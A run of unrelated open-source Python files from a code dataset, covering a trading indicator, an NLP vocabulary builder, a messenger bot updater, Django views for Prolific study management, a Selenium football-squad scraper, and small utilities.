algorithms.obv\n\n\ndef stc_slow_plot(goog_data, N=14, M=5, T=5) :\n L = goog_data[\"low_price\"].rolling(window=N).min()\n H = goog_data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((goog_data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n\n goog_data['signal'] = pd.Series(np.zeros(len(goog_data)))\n goog_data['position'] = pd.Series(np.zeros(len(goog_data)))\n\n goog_data = algorithms.obv_with_ema(goog_data)\n\n \n\n for i in range(1,len(goog_data)):\n if slow_d.iloc[i] < 30 and slow_k.iloc[i] > slow_d.iloc[i] : \n goog_data['signal'].iloc[i] = 1\n \n elif slow_k.iloc[i] > 50 and slow_k.iloc[i] < slow_d.iloc[i] : \n goog_data['signal'].iloc[i] = 0\n\n # goog_data['signal'][0:] =\\\n # np.where((slow_d[0:] < 30 and slow_k[0:] > slow_d[0:]), 1.0, 0.0)\n goog_data['orders'] = goog_data['signal'].diff()\n\n import matplotlib.pyplot as plt\n\n fig = plt.figure()\n ax1 = fig.add_subplot(211, ylabel='Google price in $')\n goog_data[\"trade_price\"].plot(ax=ax1, color='g', lw=.5)\n ax1.plot(goog_data.loc[goog_data.orders== 1.0].index,\n goog_data[\"trade_price\"][goog_data.orders == 1.0],\n '^', markersize=7, color='k')\n\n ax1.plot(goog_data.loc[goog_data.orders== -1.0].index,\n goog_data[\"trade_price\"][goog_data.orders == -1.0],\n 'v', markersize=7, color='k')\n\n\n # ax2 = fig.add_subplot(312, ylabel='MACD')\n # slow_k.plot(ax=ax2, color='black', lw=2., legend=True)\n # slow_d.plot(ax=ax2, color='g', lw=2., legend=True)\n\n # plt.legend([\"Price\",\"Short mavg\",\"Long mavg\",\"Buy\",\"Sell\"])\n plt.title(\"stc\")\n\n plt.show()\n\ndef stc_slow(data, N=9, M=3, T=3) :\n L = data[\"low_price\"].rolling(window=N).min()\n H = data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n return slow_k, slow_d\n\n\n\ndef is_stc_slow_good(data, N=9, M=3, T=3) :\n L = data[\"low_price\"].rolling(window=N).min()\n H = data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n\n if slow_k.iloc[-1] > slow_d.iloc[-1]:\n return slow_d.iloc[-1]\n return 100\n\ndef is_stc_slow_bad(data, N=9, M=3, T=3) :\n L = data[\"low_price\"].rolling(window=N).min()\n H = data[\"high_price\"].rolling(window=N).max()\n\n fast_k = ((data[\"trade_price\"] - L) / (H - L)) * 100\n slow_k = fast_k.ewm(span=M).mean()\n slow_d = slow_k.ewm(span=T).mean()\n\n return slow_k.iloc[-1] < slow_d.iloc[-1]\n","repo_name":"sanghun1210/upbit_auto_trader","sub_path":"algorithms/stochastic_slow.py","file_name":"stochastic_slow.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1394166335","text":"import os\r\nimport pandas as pd\r\nimport spacy \r\nimport torch\r\nimport pickle\r\nspacy_eng = spacy.load('en_core_web_sm')\r\nclass Vocab_Builder:\r\n def __init__ (self,freq_threshold):\r\n self.itos = {0 : \"\", 1 : \"\", 2 : \"\", 3 : \"\"} \r\n self.stoi = {\"\" : 0, \"\" : 1, \"\" : 2, \"\" : 3} \r\n self.freq_threshold = freq_threshold\r\n def __len__(self):\r\n return len(self.itos)\r\n @staticmethod\r\n def tokenizer_eng(text):\r\n return [token.text.lower() for token in spacy_eng.tokenizer(text)]\r\n def build_vocabulary(self, sentence_list):\r\n frequencies = {} \r\n idx = 4 \r\n for sentence in sentence_list:\r\n for word in self.tokenizer_eng(sentence):\r\n if word not in frequencies:\r\n frequencies[word] = 1\r\n else:\r\n frequencies[word] += 1 \r\n if(frequencies[word] == self.freq_threshold):\r\n self.stoi[word] = idx\r\n self.itos[idx] = word\r\n idx += 1\r\n def numericalize(self,text):\r\n tokenized_text = self.tokenizer_eng(text)\r\n return [self.stoi[token] if token in self.stoi else self.stoi[\"\"]\r\n for token in tokenized_text ] \r\n def denumericalize(self, tensors):\r\n text = [self.itos[token] if token in self.itos else self.itos[3]]\r\n return text\r\n","repo_name":"VedasreeRaja/ImageCaptionGenerator","sub_path":"vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43611104336","text":"import traceback\nfrom queue import Queue\nfrom threading import Event, Lock, Thread, current_thread\nfrom time import sleep\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom python_bale_bot.dispatcher import Dispatcher\nfrom python_bale_bot.error import *\nfrom python_bale_bot.utils.logger import Logger\nfrom python_bale_bot.config import Config\nfrom python_bale_bot.bot import Bot\nfrom python_bale_bot.utils.webhookhandler import WebhookServer, WebhookHandler\n\n\nclass Updater:\n _session = None\n\n def __init__(self, token, user_id, base_url=None, workers=Config.default_worker_numbers, bot=None,\n adapter_kwargs=None):\n\n self.logger = Logger.get_logger()\n\n if not token:\n raise ValueError(\"`token` did't passed\")\n\n if (token is None) and (bot is None):\n raise ValueError('`token` or `bot` must be passed')\n\n if not user_id:\n raise ValueError(\"`user_id` did't passed\")\n\n con_pool_size = workers + 4\n if bot is not None:\n # T ODO bot.adapter.pool_connections * bot.adapter.pool_maxsize or bot.adapter.pool_maxsize\n max_available_conn = bot.adapter.pool_maxsize\n self.bot = bot\n if con_pool_size > max_available_conn:\n self.logger.warning(\n 'Connection pool of Adapter object is smaller than optimal value (%s)',\n con_pool_size)\n else:\n # we need a connection pool the size of:\n # * for each of the workers\n # * 1 for Dispatcher\n # * 1 for polling Updater (even if webhook is used, we can spare a connection)\n # * 1 for JobQueue\n # * 1 for main thread\n if adapter_kwargs is None:\n adapter_kwargs = {}\n\n if 'pool_connections' not in adapter_kwargs:\n adapter_kwargs['pool_connections'] = Config.default_adapter_pool_connections\n if 'pool_maxsize' not in adapter_kwargs:\n adapter_kwargs['pool_maxsize'] = Config.default_pool_maxsize\n self.adapter = HTTPAdapter(**adapter_kwargs)\n self.session = requests.Session()\n self.bot = Bot(token, user_id, base_url, adapter=self.adapter, session=self.session)\n self.incoming_queue = Queue()\n self.__exception_event = Event()\n self.dispatcher = Dispatcher(\n self.bot,\n self.incoming_queue,\n workers=workers,\n exception_event=self.__exception_event)\n\n self.token = token\n self.timeout = Config.request_timeout\n self.last_update_id = 0\n self.running = False\n self.is_idle = False\n self.httpd = None\n self.__lock = Lock()\n self.__threads = []\n\n # self.bale_futures = []\n\n def _init_thread(self, target, name, *args, **kwargs):\n thr = Thread(target=self._thread_wrapper, name=name, args=(target,) + args, kwargs=kwargs)\n thr.start()\n self.__threads.append(thr)\n\n def _thread_wrapper(self, target, *args, **kwargs):\n thr_name = current_thread().name\n self.logger.debug('thread {0} started'.format(thr_name))\n try:\n target(*args, **kwargs)\n except Exception as ex:\n self.logger.error(ex, extra={\"tag\": \"err\"})\n self.__exception_event.set()\n self.logger.exception('unhandled exception in thread %s', thr_name)\n traceback.print_exc()\n raise\n self.logger.debug('thread {0} - ended'.format(thr_name))\n\n # TODO should implement polling behavior of updater after server api is ready\n # def start_polling(self,\n # poll_interval=0.0,\n # timeout=10,\n # clean=False,\n # bootstrap_retries=-1,\n # read_latency=2.,\n # allowed_updates=None):\n # with self.__lock:\n # if not self.running:\n # self.running = True\n #\n # # Create & start threads\n # # self.job_queue.start()#--------------------\n # dispatcher_ready = Event()\n # # self._init_thread(self.dispatcher.start, \"dispatcher\", ready=dispatcher_ready)\n # self._init_thread(self._start_polling, \"updater\", poll_interval, timeout,\n # read_latency, bootstrap_retries, clean, allowed_updates)\n #\n # dispatcher_ready.wait()\n #\n # # Return the update queue so the main thread can insert updates\n # return self.incoming_queue\n\n # def _start_polling(self, poll_interval, timeout, read_latency, bootstrap_retries, clean,\n # allowed_updates): # pragma: no cover\n # # Thread target of thread 'updater'. Runs in background, pulls\n # # updates from Telegram and inserts them in the update queue of the\n # # Dispatcher.\n #\n # self.logger.debug('Updater thread started (polling)')\n #\n # self._bootstrap(bootstrap_retries, clean=clean, webhook_url='', allowed_updates=None) # ???\n #\n # self.logger.debug('Bootstrap done')\n #\n # def polling_action_cb():\n # updates = self.bot.get_difference(\n # self.last_update_id, timeout=timeout, read_latency=read_latency,\n # allowed_updates=allowed_updates)\n #\n # if updates:\n # if not self.running:\n # self.logger.debug('Updates ignored and will be pulled again on restart')\n # else:\n # for update in updates:\n # self.incoming_queue.put(update)\n # self.last_update_id = updates[-1].update_id + 1\n #\n # return True\n #\n # def polling_onerr_cb(exc):\n # # Put the error into the update queue and let the Dispatcher\n # # broadcast it\n # self.incoming_queue.put(exc)\n #\n # self._network_loop_retry(polling_action_cb, polling_onerr_cb, 'getting Updates',\n # poll_interval)\n def start_webhook(self,\n listen=Config.webhook_listen_address,\n port=Config.webhook_listen_port,\n url_path='',\n cert=None,\n key=None,\n clean=False,\n bootstrap_retries=0,\n webhook_url=None):\n with self.__lock:\n if not self.running:\n self.running = True\n\n # Create & start threads\n # self.job_queue.start()\n self._init_thread(self.dispatcher.start, \"dispatcher\"),\n self._init_thread(self._start_webhook, \"updater\", listen, port, url_path, cert,\n key, bootstrap_retries, clean, webhook_url)\n\n # Return the update queue so the main thread can insert updates\n return self.incoming_queue\n\n def _start_webhook(self, listen, port, url_path, cert, key, bootstrap_retries, clean, webhook_url):\n self.logger.debug('Updater thread started (webhook)')\n # use_ssl = cert is not None and key is not None\n if not url_path.startswith('/'):\n url_path = '/{0}'.format(url_path)\n\n # Create and start server\n self.httpd = WebhookServer((listen, port), WebhookHandler, self.incoming_queue, url_path, self.bot)\n\n # if use_ssl:\n # self._check_ssl_cert(cert, key)\n #\n # # DO NOT CHANGE: Only set webhook if SSL is handled by library\n if not webhook_url:\n webhook_url = self._gen_webhook_url(listen, port, url_path)\n # self._bootstrap(max_retries=bootstrap_retries, clean=clean, webhook_url=webhook_url)\n # elif clean:\n # self.logger.warning(\"cleaning updates is not supported if \"\n # \"SSL-termination happens elsewhere; skipping\")\n\n self.httpd.serve_forever(poll_interval=1)\n\n # def _check_ssl_cert(self, cert, key):\n # # Check SSL-Certificate with openssl, if possible\n # try:\n # exit_code = subprocess.call(\n # [\"openssl\", \"x509\", \"-text\", \"-noout\", \"-in\", cert],\n # stdout=open(os.devnull, 'wb'),\n # stderr=subprocess.STDOUT)\n # except OSError:\n # exit_code = 0\n # if exit_code is 0:\n # try:\n # self.httpd.socket = ssl.wrap_socket(\n # self.httpd.socket, certfile=cert, keyfile=key, server_side=True)\n # except ssl.SSLError as error:\n # self.logger.exception('Failed to init SSL socket')\n # raise TelegramError(str(error))\n # else:\n # raise TelegramError('SSL Certificate invalid')\n def _network_loop_retry(self, action_cb, onerr_cb, description, interval):\n self.logger.debug('Start network loop retry %s', description)\n cur_interval = interval\n while self.running:\n try:\n if not action_cb():\n break\n except Exception as e:\n print(e)\n except RetryAfter as e:\n self.logger.info('%s', e)\n cur_interval = 0.5 + e.retry_after\n except TimedOut as toe:\n self.logger.debug('Timed out %s: %s', description, toe)\n # If failure is due to timeout, we should retry asap.\n cur_interval = 0\n except InvalidToken as pex:\n self.logger.error('Invalid token; aborting')\n raise pex\n except BaleError as te:\n self.logger.error('Error while %s: %s', description, te)\n onerr_cb(te)\n cur_interval = self._increase_poll_interval(cur_interval)\n else:\n cur_interval = interval\n\n if cur_interval:\n sleep(cur_interval)\n\n @staticmethod\n def _gen_secure_webhook_url(listen, port, url_path):\n return 'https://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)\n\n @staticmethod\n def _gen_webhook_url(listen, port, url_path):\n return 'http://{listen}:{port}{path}'.format(listen=listen, port=port, path=url_path)\n\n # TODO bootstrap issues must be fixed\n def _bootstrap(self, max_retries, clean, webhook_url, cert=None, bootstrap_interval=5):\n retries = [0]\n\n def bootstrap_del_webhook():\n self.bot.delete_webhook()\n return False\n\n def bootstrap_clean_updates():\n self.logger.debug('Cleaning updates from Bale server')\n updates = self.bot.get_difference()\n while updates:\n updates = self.bot.get_difference(updates[-1].update_id + 1)\n return False\n\n def bootstrap_set_webhook():\n self.bot.set_webhook(end_point=webhook_url)\n return False\n\n def bootstrap_onerr_cb(exc):\n if not isinstance(exc, Unauthorized) and (max_retries < 0 or retries[0] < max_retries):\n retries[0] += 1\n self.logger.warning('Failed bootstrap phase; try=%s max_retries=%s',\n retries[0], max_retries)\n else:\n self.logger.error('Failed bootstrap phase after %s retries (%s)', retries[0], exc)\n raise exc\n\n # Cleaning pending messages is done by polling for them - so we need to delete webhook if\n # one is configured.\n # We also take this chance to delete pre-configured webhook if this is a polling Updater.\n # NOTE: We don't know ahead if a webhook is configured, so we just delete.\n\n if clean or not webhook_url:\n self._network_loop_retry(bootstrap_del_webhook, bootstrap_onerr_cb,\n 'bootstrap del webhook', bootstrap_interval)\n retries[0] = 0\n # Clean pending messages, if requested.\n if clean:\n self._network_loop_retry(bootstrap_clean_updates, bootstrap_onerr_cb,\n 'bootstrap clean updates', bootstrap_interval)\n retries[0] = 0\n sleep(1)\n\n # Restore/set webhook settings, if needed. Again, we don't know ahead if a webhook is set,\n # so we set it anyhow.\n if webhook_url:\n self._network_loop_retry(bootstrap_set_webhook, bootstrap_onerr_cb,\n 'bootstrap set webhook', bootstrap_interval)\n\n @staticmethod\n def _increase_poll_interval(current_interval):\n # increase waiting times on subsequent errors up to 30secs\n if current_interval == 0:\n current_interval = 1\n elif current_interval < 30:\n current_interval += current_interval / 2\n elif current_interval > 30:\n current_interval = 30\n return current_interval\n\n def stop(self):\n \"\"\"Stops the polling/webhook thread, the dispatcher and the job queue.\"\"\"\n\n # self.job_queue.stop()\n with self.__lock:\n if self.running or self.dispatcher.has_running_threads:\n self.logger.debug('Stopping Updater and Dispatcher...')\n\n self.running = False\n\n # self._stop_httpd()\n self._stop_dispatcher()\n self._join_threads()\n\n # Stop the Session instance only if it was created by the Updater\n if self.session:\n self.session.close()\n\n def _stop_httpd(self):\n if self.httpd:\n self.logger.debug('Waiting for current webhook connection to be closed...')\n self.httpd.shutdown()\n self.httpd = None\n\n def _stop_dispatcher(self):\n self.logger.debug('Requesting Dispatcher to stop...')\n self.dispatcher.stop()\n\n def _join_threads(self):\n for thr in self.__threads:\n self.logger.debug('Waiting for {0} thread to end'.format(thr.name))\n thr.join()\n self.logger.debug(' thread {0} has been ended'.format(thr.name))\n self.__threads = []\n","repo_name":"mmdaz/Bot","sub_path":"python_bale_bot/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":14280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24423049199","text":"class Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n #nums=[i for i in nums if i !=val]\n j=0\n for i in nums:\n if i==val:\n continue\n else:\n nums[j]=i\n j+=1\n nums=nums[:j]\n return len(nums)\n\n\n ","repo_name":"abhiraj24/Leetcode","sub_path":"Arrays and Strings/remove-element/remove-element.py","file_name":"remove-element.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39627827841","text":"import json\nimport pprint\n\nfrom collections import defaultdict\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import F, Prefetch\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, FileResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import DetailView, ListView, TemplateView, View\nfrom django.views.generic.edit import CreateView, FormView, UpdateView\n\nfrom experiments import views as exp_views\nfrom experiments import models as exp_models\n\nfrom prolific import models\nfrom prolific import forms\nfrom prolific import outgoing_api\n\nclass ProlificServe(exp_views.Serve):\n def set_subject(self):\n prolific_id = self.request.GET.get('PROLIFIC_PID', None)\n if prolific_id is None:\n self.subject = None\n else:\n self.subject = exp_models.Subject.objects.get_or_create(prolific_id=prolific_id)[0]\n\n '''\n def complete(self, request):\n return redirect(reverse('prolific:complete', kwargs={'assignment_id': self.assignment.id}))\n '''\n\nclass ProlificComplete(View):\n def get(self, request, *args, **kwargs):\n assignment = get_object_or_404(\n models.Assignment,\n id=self.kwargs.get('assignment_id')\n )\n cc_url = None\n try:\n cc = models.SimpleCC.objects.get(battery=assignment.battery)\n cc_url = cc.completion_url\n except ObjectDoesNotExist:\n pass\n\n return render(request, \"prolific/complete.html\", {'completion_url': cc_url})\n\nclass SimpleCCUpdate(LoginRequiredMixin, UpdateView):\n form_class = forms.SimpleCCForm\n template_name = 'prolific/simplecc_form.html'\n\n def get_success_url(self):\n pk = self.kwargs.get('battery_id')\n return reverse('experiments:battery-detail', kwargs={'pk': pk})\n\n def get_object(self, queryset=None):\n return models.SimpleCC.objects.get_or_create(battery_id=self.kwargs.get('battery_id'), defaults={'completion_url': ''})[0]\n\nclass StudyCollectionList(LoginRequiredMixin, ListView):\n model = models.StudyCollection\n queryset = models.StudyCollection.objects.prefetch_related(Prefetch('study_set', queryset=models.Study.objects.filter(remote_id__gt='').order_by('rank'))).all()\n\nclass StudyCollectionView(LoginRequiredMixin, TemplateView):\n template_name = \"prolific/study_collection.html\"\n collection = None\n collection_kwargs = {}\n\n def get_object(self):\n collection_id = self.kwargs.get(\"collection_id\")\n if collection_id is not None:\n self.collection = get_object_or_404(models.StudyCollection, pk=collection_id)\n self.collection_kwargs={'instance': self.collection}\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['collection_id'] = self.kwargs.get(\"collection_id\")\n\n if \"form\" not in kwargs:\n context[\"form\"] = forms.StudyCollectionForm(**self.collection_kwargs)\n else:\n context[\"form\"] = kwargs.get(\"form\")\n\n initial = []\n if self.collection:\n initial = list(\n models.Study.objects.filter(study_collection=self.collection)\n .values('battery', 'rank')\n )\n if \"study_rank_formset\" not in kwargs:\n context[\"study_rank_formset\"] = forms.BatteryRankFormset(initial=initial)\n else:\n context[\"study_rank_formset\"] = kwargs.get(\"studyrankformset\")\n\n context['batteries'] = exp_models.Battery.objects.exclude(status__in=['template', 'inactive']).values_list('id', 'title')\n\n return context\n\n def get(self, request, *args, **kwargs):\n self.get_object()\n return self.render_to_response(self.get_context_data())\n\n def post(self, request, *args, **kwargs):\n self.get_object()\n form = forms.StudyCollectionForm(self.request.POST, **self.collection_kwargs)\n form.instance.user = request.user\n collection = form.save()\n\n study_rank_formset = forms.BatteryRankFormset(\n self.request.POST\n )\n\n if study_rank_formset.is_valid():\n study_set = list(collection.study_set.all())\n for i, form in enumerate(study_rank_formset):\n batt = form.cleaned_data['battery']\n rank = form.cleaned_data['rank']\n if i < len(study_set):\n study_set[i].battery = batt\n study_set[i].rank = rank\n study_set[i].save()\n else:\n new_study = models.Study(battery=batt, rank=rank, study_collection=collection)\n new_study.save()\n [x.delete() for x in study_set[len(study_rank_formset):]]\n else:\n print(study_rank_formset.errors)\n return self.render_to_response(self.get_context_data(form=form, study_rank_formset=study_rank_formset))\n\n if form.is_valid():\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-update\", kwargs={'collection_id': collection.id}))\n else:\n print(form.errors)\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-update\"))\n\ndef fetch_studies_by_status(id=None):\n try:\n study_collection = models.StudyCollection.objects.get(id=id)\n response = outgoing_api.list_studies(study_collection.project)\n except (ObjectDoesNotExist, ValueError):\n response = outgoing_api.list_studies(id)\n studies_by_status = defaultdict(list)\n for study in response:\n studies_by_status[study['status']].append(study)\n studies_by_status.default_factory = None\n return studies_by_status\n\ndef fetch_remote_study_details(id=None):\n study = outgoing_api.study_detail(id)\n participants = []\n for filter in study.get('filters', []):\n if filter.get('filter_id') == 'participant_group_allowlist':\n for gid in filter.get('selected_values', []):\n response = outgoing_api.get_participants(gid)\n participants.extend(response.get('results', []))\n return {\"study\": study, \"participants\": participants }\n\n@login_required\ndef remote_studies_list(request, id=None):\n try:\n study_collection = models.StudyCollection.objects.get(id=id)\n except (ObjectDoesNotExist, ValueError):\n study_collection = None\n\n studies_by_status = defaultdict(list)\n try:\n studies_by_status = fetch_studies_by_status(id=id)\n except Exception as e:\n messages.error(request, e)\n context = {\"studies_by_status\": studies_by_status, \"study_collection\": study_collection, \"id\": id }\n return render(request, \"prolific/remote_studies_list.html\", context)\n\n@login_required\ndef remote_study_detail(request, id=None):\n context = {}\n try:\n context = fetch_remote_study_details(id=id)\n except Exception as e:\n messages.error(request, e)\n\n return render(request, \"prolific/remote_study_detail.html\", context)\n\n@login_required\ndef create_drafts_view(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, id=collection_id)\n responses = []\n try:\n responses = collection.create_drafts()\n except Exception as e:\n messages.error(request, e)\n return render(request, \"prolific/create_drafts_responses.html\", {'responses': responses, 'id': collection_id})\n\n@login_required\ndef publish_drafts(request, collection_id):\n studies = fetch_studies_by_status(collection_id)\n responses = []\n for study in studies.get('UNPUBLISHED'):\n try:\n response = outgoing_api.publish(study['id'])\n responses.append(response)\n except Exception as e:\n messages.error(request, e)\n\n return render(request, \"prolific/create_drafts_responses.html\", {'responses': responses, 'id': collection_id})\n\n@login_required\ndef collection_progress(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, id=collection_id)\n subjects = exp_models.Subject.objects.filter(studycollectionsubject__study_collection=collection)\n studies = collection.study_set.all().order_by('rank')\n\n subject_groups = {}\n errors = []\n\n for subject in subjects:\n subject_groups[subject] = {}\n for study in studies:\n completed = exp_models.Assignment.objects.filter(status=\"completed\", subject=subject, battery=study.battery).count()\n subject_groups[subject][study.battery.id] = {'completed': completed}\n\n for study in studies:\n try:\n details = fetch_remote_study_details(id=study.remote_id)\n except e:\n errors.append(f'Error on {study.remoteid}: {e}')\n continue\n for participant in details['participants']:\n try:\n subject = subjects.get(prolific_id=participant['participant_id'])\n subject_groups[subject][study.battery.id]['date_added'] = participant['datetime_created']\n except ObjectDoesNotExist:\n subject_groups[subject][study.battery.id]['date_added'] = None\n\n context = {\n 'subject_groups': subject_groups,\n 'studies': studies,\n 'subjects': subjects,\n 'collection': collection,\n 'errors': errors\n }\n return render(request, \"prolific/collection_progress.html\", context)\n\n'''\n Should probably exist as a method of the form itself.\n given a list of prolific Ids and study collection:\n - create Subject instances for PIDs if they don't exist.\n - create assignments if subject was created?\n - StudyCollectionSubject, permenatly links collection and pid.\n - What are we really doing with this model?\n - See what batteries subject has completed\n - find earliest incomplete in StudyCollection rank order.\n - via prolific api add them to partgroup/allowlist/etc...\n'''\nclass ParticipantFormView(LoginRequiredMixin, FormView):\n template_name = \"prolific/participant_form.html\"\n form_class = forms.ParticipantIdForm\n success_url = reverse_lazy('prolific:study-collection-list')\n\n def form_valid(self, form):\n ids = form.cleaned_data['ids']\n collection = get_object_or_404(models.StudyCollection, id=self.kwargs['collection_id'])\n\n subjects = []\n for id in ids:\n subject, created = exp_models.Subject.objects.get_or_create(prolific_id=id)\n subjects.append(subject)\n\n for subject in subjects:\n subject_collection, created = models.StudyCollectionSubject.objects.get_or_create(study_collection=collection, subject=subject)\n\n pids_to_add = defaultdict(list)\n studies = models.Study.objects.filter(study_collection=collection).order_by('rank')\n # Only works with study in inner for loop, we only want to add each subject at most once to an allowlist in this call.\n for subject in subjects:\n for study in studies:\n completed = exp_models.Assignment.objects.filter(status=\"completed\", subject=subject, battery=study.battery)\n if len(completed) == 0:\n pids_to_add[study.remote_id].append(subject.prolific_id)\n break\n\n for study in studies:\n study.add_to_allowlist(pids_to_add[study.remote_id])\n\n return super().form_valid(form)\n\n@login_required\ndef clear_remote_ids(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, pk=collection_id)\n collection.clear_remote_ids()\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-list\"))\n\n@login_required\ndef toggle_collection(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, pk=collection_id)\n collection.active = not collection.active\n collection.save()\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-list\"))\n","repo_name":"expfactory/expfactory-deploy","sub_path":"expfactory_deploy/prolific/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22086361872","text":"# Solved in 6 lines excluding question\n# Divide an array in lengths of natural number sequence\n# like [1],[2,3],[4,5,6]\n# And find the maximum sum in all of the sequences\n\narr = [0, 1, 2, 3, 4, 5]\ni, pos, out = 1, 0, []\nwhile pos < (len(arr) - i + 1):\n out.append(arr[pos : pos + i])\n pos += i\n i += 1\nprint(max(sum(i) for i in out))","repo_name":"strenuousnerd8/Code","sub_path":"OptimalSequenceSum.py","file_name":"OptimalSequenceSum.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20939044771","text":"import time\n\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\nteams = ['atalanta', 'bologna-1', 'cremonese', 'empoli', 'fiorentina', 'verona', 'inter','juventus','lazio','lecce','milan',\n 'monza','napoli','roma','salernitana','sampdoria','sassuolo','spezia','torino','udinese']\n\ncognomi = []\naltezze = []\npesi = []\n\nfile_dati = open('dati_serieA.txt', 'w')\n\npath = 'C:\\\\Program Files\\\\ChromeDriver\\\\chromedriver.exe'\n\nfor team in teams:\n website = f'https://www.eurosport.it/calcio/squadre/{team}/teamcenter.shtml'\n\n # Crea Driver\n service = Service(path)\n driver = webdriver.Chrome(service=service)\n try:\n driver.get(website)\n except:\n print(f'ERRORE; {website} non raggiungibile')\n\n time.sleep(1)\n try:\n cookie_btn = driver.find_element(By.XPATH, '//div[@class=\"banner-actions-container\"]/button[@id=\"onetrust-accept-btn-handler\"]')\n cookie_btn.click()\n except:\n pass\n time.sleep(0.5)\n\n TAG_SQUADRA = '//span[@class=\"svg-icons svg-teamcompo\"]'\n squadra_btn = driver.find_element(By.XPATH, TAG_SQUADRA)\n squadra_btn.click()\n\n time.sleep(0.5)\n\n player_data = driver.find_elements(By.XPATH, '//ul[@class=\"teamcompo__list\"]/li/span')\n\n for player in player_data:\n altezza_giocatore = ''\n peso_giocatore = ''\n nome = ''\n # Se è pari allora sono le informazioni di altezza e peso\n if player_data.index(player) % 2 == 0:\n altezza_giocatore = player.find_element(By.XPATH, '//span[@class=\"player_infos\"][1]').text\n altezza_giocatore = altezza_giocatore.replace('m','')\n altezze.append(altezza_giocatore)\n\n peso_giocatore = player.find_element(By.XPATH, '//span[@class=\"player_infos\"][2]').text\n peso_giocatore = peso_giocatore.replace('kg', '')\n pesi.append(peso_giocatore)\n\n # Se è dispari informazione nome\n else:\n bandiera = player.find_element(By.XPATH,'//img[@class=\"flag\"]')\n # Se è italiano\n if bandiera.get_attribute('src') == 'src=\"https://i.eurosport.com/_iss_/geo/country/flag/small/2210.png\"':\n # Prendi nome\n nome = player.find_element(By.XPATH, '//a[@class=\"player_name\"]').text\n nome = nome.replace(' ',' ')\n cognomi.append(nome)\n else:\n pass\n\n print(team + ' ' + nome + ' '+ altezza_giocatore + ' '+ peso_giocatore)\n\n driver.close()\n\nfile_dati.write('\\n'.join(cognomi) + '\\n')\nfile_dati.write('\\n'.join(altezze) + '\\n')\nfile_dati.write('\\n'.join(pesi) + '\\n')","repo_name":"cricci3/Big_Data_es5","sub_path":"tas3_serieA.py","file_name":"tas3_serieA.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71122878886","text":"from scipy.stats import qmc\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt #\nimport os\nmpl.rcParams['savefig.format'] = \"png\"\n\ndef DesignPoint(column):\n #LogGamma, C [Linear, RBF, Sigmoid]\n sampler = qmc.LatinHypercube(d=2)\n sample = sampler.random(n=5)\n l_bounds = [0, 0]\n u_bounds = [2, 2]\n logans = qmc.scale(sample, l_bounds, u_bounds)\n ans = np.power(10, logans)\n\n figd, axd = plt.subplots(1,1,figsize=(5,5))\n plt.scatter(ans[:,0], ans[:, 1])\n plt.ylabel('C (Hyperparameter)')\n plt.xlabel('gamma (Hyperparameter)')\n plt.tight_layout()\n OutputFilename='DesignPoints_' + column +'.png'\n plt.savefig(OutputFilename)\n Command=\"open \" + \" \"+OutputFilename\n os.system(Command)\n\n return ans\n","repo_name":"amitkr2410/MachineLearning","sub_path":"SupportVectorMachine/LatinHyperCube/LatinHyperCubeSampling.py","file_name":"LatinHyperCubeSampling.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36563745681","text":"import setuptools\n\nREQUIREMENTS = [\n 'django-cms>=3.7',\n 'django-filer>=1.7',\n]\n\nsetuptools.setup(\n name=\"djangocms_svgimage\",\n version=\"1.0.11\",\n author=\"Pablo Pinargote\",\n author_email=\"pablo.pinargote@outlook.com\",\n description=\"Plugin for django CMS that allows you to add SVG images on your site.\",\n url='https://github.com/pablo-pinargote/djangocms_svgimage',\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n 